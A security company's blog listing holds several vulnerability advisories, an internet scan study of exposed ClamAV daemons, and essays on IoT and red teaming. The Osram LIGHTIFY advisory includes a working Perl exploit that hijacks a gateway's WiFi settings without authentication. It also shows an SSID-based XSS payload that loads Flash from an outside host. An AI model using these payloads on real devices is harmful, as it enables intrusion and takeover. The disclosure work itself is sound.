Skip navigation
All Places > Information Security > Blog
1 2 3 Previous Next

Information Security

659 posts

Nine issues affecting the Home or Pro versions of Osram LIGHTIFY were discovered, with the practical exploitation effects ranging from the accidental disclosure of sensitive network configuration information, to persistent cross-site scripting (XSS) on the web management console, to operational command execution on the devices themselves without authentication. The issues are designated in the table below. At the time of this disclosure's publication, the vendor has indicated that all but the lack of SSL pinning and the issues related to ZigBee rekeying have been addressed in the latest patch set.

 

Description

Status

Platform

R7 ID

CVE

Cleartext WPA2 PSK

Fixed

Home

R7-2016-10.1

CVE-2016-5051

Lack of SSL Pinning

Unfixed

Home

R7-2016-10.2

CVE-2016-5052

Pre-Authentication Command Execution

Fixed

Home

R7-2016-10.3

CVE-2016-5053

ZigBee Network Command Replay

Unfixed

Home

R7-2016-10.4

CVE-2016-5054

Web Management Console Persistent XSS

Fixed

Pro

R7-2016-10.5

CVE-2016-5055

Weak Default WPA2 PSKs

Fixed

Pro

R7-2016-10.6

CVE-2016-5056

Lack of SSL Pinning

Unfixed

Pro

R7-2016-10.7

CVE-2016-5057

ZigBee Network Command Replay

Unfixed

Pro

R7-2016-10.8

CVE-2016-5058

Cached Screenshot Information Leak

Fixed

Pro

R7-2016-10.9

CVE-2016-5059

 

Product Description

According to the vendor's January, 2015 press release, Osram LIGHTIFY provides "a portfolio of cost-effective indoor and outdoor lighting products that can be controlled and automated via an app on your mobile device to help you save energy, enhance comfort, personalize your environment, and experience joy and fun." It is used for both residential and commercial customers, using either the Home and Pro versions, respectively. As a "smart lighting" offering, Osram LIGHTIFY is part of the Internet of Things (IoT) landscape, and is compatible with other ZigBee based automation solutions.

Credit

These issues were discovered by Deral Heiland, Research Lead at Rapid7, Inc., and this advisory was prepared in accordance with Rapid7's disclosure policy.

Exploitation and Mitigation

R7-2016-10.1: Cleartext WPA2 PSK (Home) (CVE-2016-5051)

Examination of the mobile application for LIGHTIFY Home, running on an iPad revealed the WiFi WPA pre-shared key (PSK) of the user's home WiFi as stored in cleartext in the file, /private/var/mobile/Containers/Data/Application/F1D60C51-6DF5-4AAE-9DB1- 40ECBDBDF692/Library/Preferences//com.osram.lightify.home.plist. Examining this file reveals the cleartext string as shown in Figure 1:

Figure 1, Cleartext WPA2 PSK

 

If the device is lost or stolen, an attacker could extract this data from the file.

Mitigation for R7-2016-10.1

A vendor-supplied patch should configure the mobile app to prevent storing potentially sensitive information, such as WiFi PSKs and passwords in cleartext. While some local storage is likely necessary for normal functionality, such information should be stored in an encrypted format that requires authentication.

 

Absent a vendor-supplied patch, users should avoid connecting the product to a network that is intended to be hidden or restricted. In cases where this is undesirable, users should ensure that the mobile device is configured for full-disk encryption (FDE) and require at least a password on first boot.

R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052)

Examination of the mobile application reveals that SSL pinning is not in use. By not implementing SSL pinning, it is possible for an attacker to conduct a Man-in-the-Middle (MitM) attack, ultimately exposing SSL-encrypted traffic to the successful attacker for inspection and manipulation.

Mitigation for R7-2016-10.2

A vendor-supplied patch should configure the mobile application to use SSL pinning.

 

Absent a vendor-supplied patch, users should avoid using the mobile application in potentially hostile networks.

R7-2016-10.3: Pre-Authentication Command Execution (Home) (CVE-2016-5053)

Examination of the network services on the gateway shows that port 4000/TCP is used for local control when Internet services are down, and no authentication is required to pass commands to this TCP port. With this access, an unauthenticated actor can execute commands to change lighting, and also execute commands to reconfigure the devices. The following Perl script proof of concept code can be used to reconfigure a vulnerable device's primary WiFi connection, causing it to reconnect to an attacker-supplied WiFi network.

 

#!/usr/bin/perl
# POC to change SSID setting on OSRAM LIGHTIFY GATEWAY
# Deral Heiland, Rapid7, Inc.

use IO::Socket;
if ($#ARGV != 2) {
  print " You are missing needed Arguments\n";
  print "Usage: lightify_SSID_changer.pl TargetIP SSID WPA_PSK \n";
  exit(1);
}

# Input variables
my $IP = $ARGV[0];
my $SSID = $ARGV[1];
my $WPAPSK = $ARGV[2];

# Set up TCP socket
$socket = new IO::Socket::INET (
  PeerAddr => $IP,
  PeerPort => 4000,
  Proto => TCP,
  )
or die "Couldn't connect to Target\n";

#Set up data to send to port 4000
$data1 = "\x83\x00\x00\xe3\x03\x00\x00\x00\x01";
$data2 = pack('a33',"$SSID");
$data3 = pack('a69',"$WPAPSK");
$data4 = "\x04\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$send_data = join "", $data1, $data2, $data3, $data4;

#send data to port 4000
$socket->send($send_data);
close $socket;
exit;

 

 

Mitigation for R7-2016-10.3

A vendor-supplied patch should implement and enforce authentication on the gateway's 4000/TCP interface.

 

Absent a vendor-supplied patch, users should not deploy the gateway in a network environment used by potentially malicious actors.

R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054)

Examination of the ZigBee home automation communication reveals that no rekeying of the Zigbee secure communication takes place after the initial pairing of the ZigBee-enabled end nodes (the light components of the system). Due to this lack of routine rekeying, it is possible for a malicious actor to capture and replay the Zigbee communication at any time, and replay those commands to disrupt lighting services without any other form of authentication.

Mitigation for R7-2016-10.4

A vendor-supplied patch should implement routine rekeying of the ZigBee-enabled components of the system.

 

Absent a vendor-supplied patch, users should not deploy the lighting components in a network environment used by potentially malicious actors.

R7-2016-10.5: Web Management Console Persistent XSS (Pro) (CVE-2016-5055)

The installed web management console, which runs on ports 80/TCP and 443/TCP, is vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within the Pro web management interface. When this data is viewed within the web console, the injected code will execute within the context of the authenticated user. As a result, a malicious actor can inject code which could modify the system configuration, exfiltrate or alter stored data, or take control of the product in order to launch browser-based attacks against the authenticated user's workstation.

 

The first example of this flaw was found by injecting persistent XSS into the security logs via the username field during the basic authentication sequence, as shown below in Figure 2.

Figure 2: Username XSS Injection

 

Anything entered in the "User Name" field gets written to the security logs without sanitization. When these logs are reviewed, the JavaScript is rendered and executed by the victim's browser. Figure 3 demonstrates an alert box run in this way.

Figure 3: Injected JavaScript Alert Box

The second example of this flaw was found by injecting XSS into the Wireless Client Mode configuration page. This was accomplished using a rogue access point to broadcast an SSID containing the XSS payload. Using the following airbase-ng command, it is possible to broadcast the XSS payload as an SSID name.

 

bash airbase-ng -e '</script><embed src=//ld1.us/4.swf>' -c 9 wlan0mon

 

When the SSID of </script><embed src=//ld1.us/4.swf> is displayed on the Wireless Client Mode configuration page, the referenced Flash file is downloaded and run in the context of the authenticated user. This is shown in Figure 4.

Mitigation for R7-2016-10.5

A vendor supplied patch should enforce that all data should be filtered and special characters such as > and <should be properly escaped before being displayed by the web management console.

 

Absent a vendor-supplied patch, users should not deploy the web management console in a network environment used by potentially malicious actors.

R7-2016-10.6: Weak Default WPA2 PSKs (Pro) (CVE-2016-5056)

Weak default WPA2 pre-shared keys (PSKs) were identified on the devices examined, which used an eight character PSK using only the characters from the set "0123456789abcdef". This extremely small keyspace of limited characters and a fixed, short length makes it possible to crack a captured WPA2 authentication handshake in less than 6 hours, leading to remote access to the cleartext WPA2 PSK. Figure 5 shows the statistics of cracking the WPA2 PSK on one device in 5 hours and 57 minutes.

Figure 5: Hashcat Cracking WPA2 PSK in Under Six Hours

 

A second device's WPA2 PSK was cracked in just 2 hours and 42 minutes, as shown in Figure 6:

Figure 6: Hashcat Cracking WPA2 PSK in Under Three Hours

Mitigation for R7-2016-10.6

A vendor-supplied patch should implement a longer default PSKs utilizing a larger keyspace that includes both uppercase and lowercase alphanumeric characters and punctuation, since these keys are not typically intended to be remembered by humans.

 

Absent a vendor-supplied patch, users should set their own PSKs with the above advice, and not rely on the shipped defaults by the vendor.

R7-2016-10.7: Lack of SSL Pinning (Pro) (CVE-2016-5057)

As in the Home version of the system, the Pro version does not implement SSL pinning in the mobile app. See R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052), above.

R7-2016-10.8: ZigBee Network Command Replay (Pro) (CVE-2016-5058)

As in the Home version of the system, the Pro version does not implement rekeying of the ZigBee commands. See R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054), above.

R7-2016-10.9: Cached Screenshot Information Leak (Pro) (CVE-2016-5059)

Examination of the commissioning app revealed that the application was caching screenshot of the current page when the IPAD home button was selected in the folder, /private/var/mobile/Containers/Data/Application/A253B0DA-CFCE-433AB0A1- EAEB7B10B49C/Library/Caches/Snapshots/com.osram.LightifyPro/com.osr am.LightifyPro.

 

This practice can often lead to confidential data being stored within the snapshot folder on the IPAD device. As shown in Figure 7, the plain text password of the gateway is displayed in the cached screenshot.

 

Mitigation for R7-2016-10.9

A vendor-supplied patch should use a default page for the Downscale function when the home button is pressed, and that all passwords and keys displayed on the application configuration pages be obfuscated with asterisks.

 

Absent a vendor-supplied patch, users should be mindful of when they minimize the running mobile application to avoid accidentally disclosing sensitive information.

Disclosure Timeline

  • Mon, May 16, 2016: Initial contact to the vendor by Rapid7.
  • Tue, May 17, 2016: Vendor acknowledged receipt of vulnerability details.
  • Tue, May 31, 2016: Details disclosed to CERT/CC (Report number VR-174).
  • Wed, Jun 01, 2016: CVEs assigned by CERT/CC.
  • Thu, Jul 07, 2016: Disclosure timeline updated and communicated to the vendor and CERT/CC.
  • Thu, Jul 21, 2016: Vendor provided an update on patch development.
  • Tue, Jul 26, 2016: Public disclosure of the issues.

Over the last few months, Jordan Rogers and I have been speaking about the benefits of doing the basics right in information security.

 

Reducing noise, avoiding the waste of precious budget dollars on solutions that will not be used to their fullest, as well as improving the overall security of your enterprise are all goals that can be achieved with some of these simple tips.

 

We presented a hybrid Mac/Windows version of this talk at the MacAdmins conference at PSU, where it was filmed and uploaded to YouTube.

 

Take a look if you'd like to hear the perspective of an Incident Response person combined with a Blue Team person, information from real problems we observed, as well as recommendations on how to mitigate those issues!

 

From the trenches: Breaches, Stories, Simple Security Solutions - YouTube

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

Recently, I wrote about my thoughts on why we feel like we have to force short-term password changes in the name of “security.” Since that time, Microsoft made an announcement to step in and help set its users (and itself) up for success with more stringent password requirements for Microsoft Account and Azure Active Directory. Sad it has come to this – a vendor doing what they must do to force people to use stronger passwords. We’re devolving as computer users.

 

Shown in study after study, i.e. Ponemon, Verizon, and (especially) this insightful research from Rapid7: the basics are ignored, we cry out for newer and better security controls, government regulations grow – and, yet, nothing gets better. Apparently the information security basics such as weak passwords are just too much to ask for. Take for instance, the work Security, Accuracy, and Privacy in Computer Systems – a great book written by the late James Martin. It covers all sorts of security basics – what’s needed and how to balance it all out. That book was written in 1973. We still can’t get security right. Not even passwords.

 

So, what is the answer? Is it IT’s fault? IT and security teams, and the executives heading things up are certainly complicit. Some ignore password vulnerabilities. Some have trouble getting their messages across. Others are afraid to say anything, especially given the predictable pushback from management. Users are on the hook as well. As much as we try to set them up for success through technical controls and awareness/training, at some point, they need to be held accountable. They’re grown-ups and it’s not like this whole computer password thing is something new.

 

Maybe we should continue down the path of making things more complex through regulations, lawyers, and technical controls that promise to make everything better. Ha! Not unlike attempts at failed social initiatives involving emotional responses to crises rather than due process, I suspect we’ll continue down the path of more laws, more policies, more audits, and a growing false sense of security. Our current approach to passwords is not working. Maybe that’s okay – perhaps someone else can figure it out down the road.

 

Mark Matteson was quoted as saying “Good habits are hard to form and easy to live with. Bad habits are easy to form and hard to live with. Pay attention. Be aware. If we don’t consciously form good ones, we will unconsciously form bad ones.” With weak passwords – more than any other computer security vulnerability - what I believe we need is need is discipline. Discipline on the part of IT and security teams. Discipline on the part of users. Discipline on the part of management. That and some backbone to see things through over time (again, especially with passwords) until the challenges are resolved. Unless and until something changes in this area, I suspect we’ll continue down this path of ignorant bliss and continued breaches.

Due to a lack of encryption in communication with the associated web services, the Seeking Alpha mobile application for Android and iPhone leaks personally identifiable and confidential information, including the username and password to the associated account, lists of user-selected stock ticker symbols and associated positions, and HTTP cookies.

Credit

Discovered by Derek Abdine (@dabdine) of Rapid7, Inc., and disclosed in accordance with Rapid7’s disclosure policy.

Product Description

Seeking Alpha provides individuals with the ability to track and quantify their stock portfolio holdings. The vendor’s website states “Seeking Alpha is a platform for investment research, with broad coverage of stocks, asset classes, ETFs and investment strategy. In contrast to other equity research platforms, insight is provided by investors and industry experts rather than sell-side analysts.”

Exploitation

An attacker in a privileged position on the target's network can intercept, view, and modify communications between the Seeking Alpha mobile application and its associated web services trivially, due to the reliance on HTTP cleartext communications, rather than HTTPS. HTTP is used for routine polling for stock ticker symbols the user has configured, which may reveal overly personal financial information about the user that could be used in a targeted attack.

 

In addition, HTTP is used for the authentication sequence. The user's full e-mail address, password, and HTTP session tokens are transmitted in the clear, as are less critical elements such as the fingerprintable User-Agent (which reveals build and platform information).

 

In this sample, a user login information (username, password) may be obtained using a simple packet capture:

 

Mobile device characteristics can also be retrieved (Android OS version and Android Device Token are present):

 

Furthermore, persistent session information (the user ID, email address and the session token aka “user_remember_token”) is clearly visible:

 

Stock ticker symbols are also included (either when added, or when receiving portfolio holdings, which may include positions per symbol if the user has entered those):

 

Curiously, HTTPS requests to https://seekingalpha.com using a normal browser on a traditional PC or laptop are also redirected to HTTP services, rather than the reverse. This includes the authentication sequence. This observation seems to indicate that the preference for HTTP over HTTPS appears to permeate through the engineering practices at Seeking Alpha.

Mitigation

Until Seeking Alpha provides a fix for the mobile application, users are strongly advised to not use the application while connected to untrusted networks. The use of a VPN will also help alleviate the most likely risk of a nearby eavesdropper on a public network, but note that this would protect communication only as far as the VPN endpoint.

Disclosure Timeline

This vulnerability is being disclosed in accordance with Rapid7's disclosure policy.

 

  • Tue, May 03, 2016: Initial contact to security@seekingalpha.com and other aliases.
  • Wed, May 19, 2016: Confidential disclosure to CERT (VR-142).
  • Wed, Jul 13, 2016: Public disclosure (planned).


A little over a week ago some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on an accessible TCP port. Shortly thereafter, Robert Graham unholstered his masscan tool and did a summary blog post on the extent of the issue on the public internet. The ClamAV team (which is a part of Cisco) did post a response, but the reality is that if you're running ClamAV on a server on the internet and misconfigured it to be listening on a public interface, you're susceptible to a trivial application denial of service attack and potentially susceptible to a file system enumeration attack since anyone can try virtually every conceivable path combination and see if they get a response.

 

Given that it has been some time since the initial revelation and discovery, we thought we'd add this as a regular scan study to Project Sonar to track the extent of the vulnerability and the cleanup progress (if any). Our first study run was completed and the following are some of the initial findings.

 

Our study found 1,654,211 nodes responding on TCP port 3310. As we pointed out in our recent National Exposure research (and as Graham noted in his post) a great deal of this is "noise". Large swaths of IP space are configured to respond "yes" to "are you there" queries to, amongst other things, thwart scanners. However, we only used the initial, lightweight "are you there" query to determine targets for subsequent full connections and ClamAV VERSION checks. We picked up many other types of servers running on TCP pot 3310, including nearly:

 

  • 16,000 squid proxy servers
  • 600 nginx servers (20,000 HTTP servers in all)
  • 500 database servers
  • 600 SSH servers

 

But, you came here to learn about the ClamAV servers, so let's dig in.

 

Clam Hunting

 

We found 5,947 systems responding with a proper ClamAV response header to the VERSION query we submitted. Only having around 6,000 exposed nodes out of over 350 million PINGable nodes is nothing to get really alarmed about. This is still an egregious configuration error, however, and if you have this daemon exposed in this same way on your internal network it's a nice target for attackers that make their way past your initial defenses.

 

5,947 is a small enough number that we can easily poke around at the data a bit to see if we can find any similarities or learn any lessons. Let's take a look at the distribution of the ClamAV versions:

 

found_servers.pngYou can click on that chart to look at the details, but it's primarily there to show that virtually every ClamAV release version is accounted for in the study, with some dating back to 2004/2005. If we zoom in on the last part of the chart, we can see that almost half (2,528) of the exposed ClamAV servers are running version 0.97.5, which itself dates back to 2012. While I respect Graham's guess that these may have been unmaintained or forgotten appliances, there didn't seem to be any real pattern to them as we looked at DNS PTR records and other host metadata we collected. These all do appear to have been just "set and forgot" installs, reinforcing our findings in the National Exposure report that there are virtually no barriers to entry for standing up or maintaining nodes on the internet.

 

lastbit.png

 

A Banner Haul

 

Now, not all VERSION queries respond with complete banner information but over half did and said response banner contains both the version string and the last time the scanner had a signature update. Despite the poor network configuration of the nodes, 2,930 (49.3%) of them were at least current with their signatures, but 346 of them weren't, with a handful being over a decade out of "compliance." We here at Rapid7 strive to stay within the rules, so we didn't poke any deeper to try to find out the signature (or further vulnerability) status of the other ClamAV nodes.

 

hygiene.png

 

As we noted above, we performed post-scan DNS PTR queries and WHOIS queries for these nodes, but this exercise proved to be less than illuminating. These are nodes of all shapes and sizes sitting across many networks and hosting providers. There did seem to be a large commonality of these ClamAV systems running on hosts in "mom and pop" ISPs and we did see a few at businesses and educational institutions, but overall these are fairly random and probably (in some cases) even accidental ClamAV deployments.

 

As a last exercise, we grouped the ClamAV nodes by autonomous system (AS) and tallied up the results. There was a bit of a signal here that you can clearly see in this list of the "top" 10 ASes:

 

ASAS NameCount%
4766KIXS-AS-KR Korea Telecom, KR1,73329.1%
16276OVH, FR5138.6%
3786LGDACOM LG DACOM Corporation, KR3165.3%
25394MK-NETZDIENSTE-AS, DE2824.7%
35053PHADE-AS, DE2634.4%
11994CZIO-ASN - Cruzio, US2514.2%
41541SWEB-AS Serveisweb, ES1752.9%
9318HANARO-AS Hanaro Telecom Inc., KR1472.5%
23982SENDB-AS-KR Dongbu District Office of Education in Seoul, KR1041.7%
24940HETZNER-AS, DE651.1%

 

Over 40% of these systems are on networks within the Republic of Korea. If we group those by country instead of AS, this "geographical" signal becomes a bit stronger:

 

CountryCount%
1Korea, Republic of2,46341.4%
2Germany83014.0%
3United States65911.1%
4France5128.6%
5Spain2163.6%
6Italy1712.9%
7United Kingdom991.7%
8Russian Federation781.3%
9Japan671.1%
10Brazil621.0%

 

 

What are some takeaways from these findings?

 

  • Since there was a partial correlation to exposed ClamAV nodes being hosted in smaller ISPs it might be handy if ISPs in general offered a free or very inexpensive "hygiene check" service which could provide critical information in understandable language for less tech-savvy server owners.

  • While this exposure is small, it does illustrate the need for implementing a robust configuration management strategy, especially for nodes that will be on the public internet. We have tools that can really help with this, but adopting solid DevOps principles with a security mindset is a free, proactive means of helping to ensure you aren't deploying toxic nodes on the internet.

  • Patching and upgrading go hand-in-hand with configuration management and it's pretty clear almost 6,000 sites have not made this a priority. In their defense, many of these folks probably don't even know they are running ClamAV servers on the internet.

  • Don't forget your security technologies when dealing with configuration and patch management. We cyber practitioners spend a great deal of time pontificating about the need for these processes but often times do not heed our own advice.

  • Turn stuff off. It's unlikely the handfuls of extremely old ClamAV nodes are serving any purpose, besides being easy marks for attackers. They're consuming precious IPv4 space along with physical data center resources that they just don't need to be consuming.

  • Don't assume that if your ClamAV (or any server software, really) is "just internal" that it's not susceptible to attack. Be wary of leaving egregiously open services like this available on any network node, internally or externally.

 

Fin

 

Many thanks to Jon Hart, Paul Deardorff & Derek Abdine for their engineering expertise on Project Sonar in support of this new study. We'll be keeping track of these ClamAV deployments and hopefully seeing far fewer of them as time goes on.

 

Drop us a note at research@rapid7.com or post a comment here if you have any questions about this or future studies.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             

Nearly every conversation I have had around the Internet of Things (IoT) and what it means to an organization starts off with the question, “What is IoT?” This question is often followed by many people giving many different answers. I'm sure I won't solve this problem here in a single blog post, but I hope to add some food for thought.

 

What IoT is Not

 

You would expect to start off with a list of things that make up IoT, but I was thinking maybe the first thing is to define what it is not, if that is even doable. Reading through a 2014 article in NetworkWorld, “Eight Internet Things That are Not IoT” we find the following list of items analysts have listed as not being IoT:

 

  • Desktops
  • Laptops
  • Tablets
  • Smartphones
  • Traditional Mobile Phones
  • TVs
  • DVD/MP3 players
  • Game consoles

 

This list demonstrates how fast technology is evolving.  While it was a pretty solid list when it was created two years ago, I think we can all agree that today, it's no longer accurate. Significant technological innovations in a number of these items means they are now considered either to be IoT in themselves, or directly tied to an IoT ecosystem. For example, smart TVs have the ability to watch us, record our every move, and communicate that information to a cloud API over the Internet. They also allow us to communicate and control them via voice and applications on our laptops, tablets, and smartphones.

 

poltergeist5.jpeg

 

Though the article discussed what is not classified as IoT based on its physical purpose, or requiring human interaction, it has quickly become outdated. Using this information, we can conclude that given the rate of innovation, what isn't categorized as IoT today, may very well be tomorrow, so trying to define what isn't IoT isn't necessarily the best direction to go in.

 

Traits of IoT

 

Maybe the better way to answer, “What is IoT?” is by defining the functions that make something IoT. Although, this process does have its own issues. For example, to be classified as a part of IoT, must it communicate to the Internet? If we claim that this is a litmus test for determining it, a large quantity of technologies currently classified as IoT that are in use with industrial and enterprise areas would not meet this requirement.

 

After reading through a number of documents and papers on the matter and reading many definitions there are four common elements I have identified that are part of the typical identification of IoT:

 

  • Interrelated devices: IoT environments always consist of multiple interrelated systems and technologies which can include: gateways, sensors, actuators, mobile technology, cloud systems and host systems.
  • Collecting and sharing data: IoT technology is always found to collect and/or share data from sensors and controllers. This data may be a simple as audio commands from your smart TV to the cloud, or as sensitive as data from a temperature sensor used to control a high pressure boiler system within a SCADA environment.
  • Networked together: IoT systems are always network interconnected. This is required to facilitate the exchange of data between the interrelated devices that make up an IoT environment.
  • Embedded electronics: Embedded electronics is the corner stone of the IoT. Their specialized functionality and reduction in size has helped fuel the growth of IoT. Without it, IoT would not exist.

 

Devices vs. Ecosystem

 

Of course, these four items on their own do not completely define IoT, or better stated, do not completely define the IoT ecosystem. Before we dig into the remainder of this definition, let's explore the concept of an IoT ecosystem. This is key to understanding IoT - we should not consider the technology as stand-alone devices, but rather as elements of a rich, interconnected, technological ecosystem. In a previous blog I stated the following:

 

“ecosystem—this is where we consider the entire security picture of IoT, and not just one facet of the technology.”

 

The ecosystem encompasses all of the interrelated parts that make an IoT solution work. Based on that, I believe any device or technology can be part of an existing IoT ecosystem, including desktop computers. If we try to label any technology as “not IoT” we are going to end up either rewriting the rules six months down the road or completely failing when we try to properly define security risk as they relate to deployed IoT solutions. The best way to solve these issues is to understand what an IoT ecosystem is so that we can more effectively define risk and develop solutions to mitigate those risks.

 

Traits of an IoT Ecosystem

 

As I said before, the IoT is not about stand-alone devices and if we try to approach it that way we will fall short trying to secure it. IoT is an environment that has an ecosystem that encompasses multiple devices (physical and virtual), technologies (mobile, cloud, etc.), communication methods (Ethernet, Wifi, Zigbee, etc.), and locations (internet, cloud, remote monitoring and control).

 

Continuing down that path, the following five bullets expand on the Traits of IoT listed above. There is no need for all of these to exist, but typically I find at least a couple of these items do apply to all IoT ecosystems I have encountered.

 

  • Mobile technology
  • Multiple end nods (sensors, actuators)
  • Cloud APIs
  • Multiple communications methods (Ethernet, Wifi, Zigbee, Bluetooth, ZWave)
  • Remote Monitoring or Control

 

I believe by combining these two lists above into a series of questions we can identify the most common traits that make up an IoT ecosystem. This will help us identify the "whole" of an IoT ecosystem. In the end, by properly understanding and identifying the ecosystem we can better test, maintain, and properly secure our rapidly expanding IoT world.

 

  • Which interrelated devices interact as part of this IoT environment?
  • How and where do they collect and share data?
  • Which technologies are networked together?
  • Which systems utilize embedded electronics?
  • Does it use mobile technology? How and where?
  • Are multiple end nods (sensors, actuators) being used?
  • What and where are the Cloud APIs and how do they interrelate?
  • Are multiple communications methods (Ethernet, Wifi, Zigbee, Bluetooth, ZWave) being used? Which ones?
  • What systems and locations use remote monitoring or control?

 

Hopefully I have given some food for thought and we can work on answering the bigger question, “What is the IoT ecosystem and how do we secure it?” I would love to hear your thoughts on this subject as we work together to secure the world of IoT.

In a fight between pirates and ninjas, who would win? I know what you are thinking. “What in the world does this have to do with security?” Read on to find out but first, make a choice: Pirates or Ninjas?

 

Before making that choice, we must know what the strengths and weaknesses are for each:

 

pirate_vs__ninja_by_majorwhoabutwhy-d36k6go.png

Pirates

Strengths

Weaknesses

Strong

Loud

Brute-Force Attack

Drunk (Some say this could be a strength too)

Great at Plundering

Can be Careless

Long-Range Combat

 

 

Ninjas

Strengths

Weaknesses

Fast

No Armor

Stealthy

Small

Dedicated to Training

 

Hand-to-Hand/Sword Combat

 

 

pirates_vs_ninjas_by_kino18.jpg

 

It comes down to which is more useful in different situations. If you are looking for treasure that is buried on an island and may run into the Queen's Navy, you probably do not want ninjas. If you are trying to assassinate someone, then pirates are probably not the right choice.

 

The same is true when it comes to Penetration Testing and Red Team Assessments. Both have strengths and weaknesses and are more suited to specific circumstances. To get the most value, first determine what your goals are, then decide which best corresponds with those goals.

 

Penetration Testing

 

Penetration testing is usually rolled into one big umbrella with all security assessments. A lot of people do not understand the differences between a Penetration Test, a Vulnerability Assessment, and a Red Team Assessment, so they call them all Penetration Testing. However, this is a misconception. While they may have similar components, each one is different and should be used in different contexts.

 

At its core, real Penetration Testing is testing to find as many vulnerabilities and configuration issues as possible in the time allotted, and exploiting those vulnerabilities to determine the risk of the vulnerability. This does not necessarily mean uncovering new vulnerabilities (zero days), it's more often looking for known, unpatched vulnerabilities. Just like Vulnerability Assessments, Penetration Testing is designed to find vulnerabilities and assess to ensure they are not false positives. However, Penetration Testing goes further, as the tester attempts to exploit a vulnerability. This can be done numerous ways and, once a vulnerability is exploited, a good tester will not stop. They will continue to find and exploit other vulnerabilities, chaining attacks together, to reach their goal. Each organization is different, so this goal may change, but usually includes access to Personally Identifiable Information (PII), Protected Health Information (PHI), and trade secrets. Sometimes this requires Domain Administrator access; often it does not or Domain Administrator is not enough.

 

Who needs a penetration test? Some governing authorities require it, such as SOX and HIPAA, but organizations already performing regular security audits internally, and implementing security training and monitoring, are likely ready for a penetration test.

 

Red Team Assessment

 

A Red Team Assessment is similar to a penetration test in many ways but is more targeted. The goal of the Red Team Assessment is NOT to find as many vulnerabilities as possible. The goal is to test the organization’s detection and response capabilities. The red team will try to get in and access sensitive information in any way possible, as quietly as possible. The Red Team Assessment emulates a malicious actor targeting attacks and looking to avoid detection, similar to an Advanced Persistent Threat (APT). (Ugh! I said it…) Red Team Assessments are also normally longer in duration than Penetration Tests. A Penetration Test often takes place over 1-2 weeks, whereas a Red Team Assessment could be over 3-4 weeks or longer, and often consists of multiple people.

 

A Red Team Assessment does not look for multiple vulnerabilities but for those vulnerabilities that will achieve their goals. The goals are often the same as the Penetration Test. Methods used during a Red Team Assessment include Social Engineering (Physical and Electronic), Wireless, External, and more. A Red Team Assessment is NOT for everyone though and should be performed by organizations with mature security programs. These are organizations that often have penetration tests done, have patched most vulnerabilities, and have generally positive penetration test results.

 

The Red Team Assessment might consist of the following:

 

A member of the Red Team poses as a Fed-Ex delivery driver and accesses the building. Once inside, the Team member plants a device on the network for easy remote access. This device tunnels out using a common port allowed outbound, such as port 80, 443, or 53 (HTTP, HTTPS, or DNS), and establishes a command and control (C2) channel to the Red Team’s servers. Another Team member picks up the C2 channel and pivots around the network, possibly using insecure printers or other devices that will take the sights off the device placed. The Team members then pivot around the network until they reach their goal, taking their time to avoid detection.

 

This is just one of innumerable methods a Red Team may operate but is a good example of some tests we have performed.

 

pirate-vs-ninja-3-resize-575.jpg

 

So... Pirates or Ninjas?

 

Back to pirates vs. ninjas. If you guessed that Penetration Testers are pirates and Red Teams are ninjas, you are correct. Is one better than the other? Often Penetration Testers and Red Teams are the same people, using different methods and techniques for different assessments. The true answer in Penetration Test vs. Red Team is just like pirates vs. ninjas; one is not necessarily better than the other. Each is useful in certain situations. You would not want to use pirates to perform stealth operations and you would not want to use ninjas to sail the seas looking for treasure. Similarly, you would not want to use a Penetration Test to judge how well your incident response is and you would not want to perform a Red Team assessment to discover vulnerabilities.

This disclosure will address a class of vulnerabilities in a Swagger Code Generator in which injectable parameters in a Swagger JSON or YAML file facilitate remote code execution. This vulnerability applies to NodeJS, PHP, Ruby, and Java and probably other languages as well.  Other code generation tools may also be vulnerable to parameter injection and could be affected by this approach. By leveraging this vulnerability, an attacker can inject arbitrary execution code embedded with a client or server generated automatically to interact with the definition of service.  This is considered an abuse of trust in definition of service, and could be an interesting space for further research.

 

According to swagger.io - “Swagger is a simple yet powerful representation of your RESTful API. With the largest ecosystem of API tooling on the planet, thousands of developers are supporting Swagger in almost every modern programming language and deployment environment. With a Swagger-enabled API, you get interactive documentation, client SDK generation, and discoverability.

 

Within the Swagger ecosystem, there are fantastic code generators which are designed to automagically take a Swagger document and then generate stub client code for the described API. This is a powerful part of the solution that makes it easy for companies to provide developers the ability to quickly make use of their APIs. The Swagger definitions are flexible enough to describe most RESTful API’s and give developers a great starting point for their API client. The problems discussed here is that several of these code generators do not take into account the possibility of a malicious Swagger definition document which results in a classic parameter injection, with a new twist on code generation.

 

Maliciously crafted Swagger documents can be used to dynamically create HTTP API clients and servers with embedded arbitrary code execution in the underlying operating system. This is achieved by the fact that some parsers/generators trust insufficiently sanitized parameters within a Swagger document to generate a client code base.

  • On the client side, a vulnerability exists in trusting a malicious Swagger document to create any generated code base locally, most often in the form of a dynamically generated API client.
  • On the server side, a vulnerability exists in a service that consumes Swagger to dynamically generate and serve API clients, server mocks and testing specs.

Client Side

swagger-codegen contains a template-driven engine to generate client code in different languages by parsing a Swagger Resource Declaration. It is packaged or referenced in several open source and public services provided by smartbear.com such as generator.swagger.io, editor.swagger.io, and swaggerhub.com. Other commercial products include restlet.com (restlet-studio) and restunited.com. These services appear to generate and store these artifacts (but not execute) and are able to be publicly downloaded and consumed. Remote code execution is achieved when the download artifact is executed on the target.

Server Side

Online services exist that consume Swagger documents and automatically generate and execute server-side application, test specs, and mock servers provide a potential for remote code execution. Some identified commercial platforms that follow this model include: vRest.io, ritc.io, restunited.com, stoplight.io, and runscope.com.

Credit

These issues were discovered by Scott Davis of Rapid7, Inc., and reported in accordance with Rapid7's disclosure policy.

Exploitation

Please see the associated Metasploit exploit module for examples for the following languages.

swagger-codegen

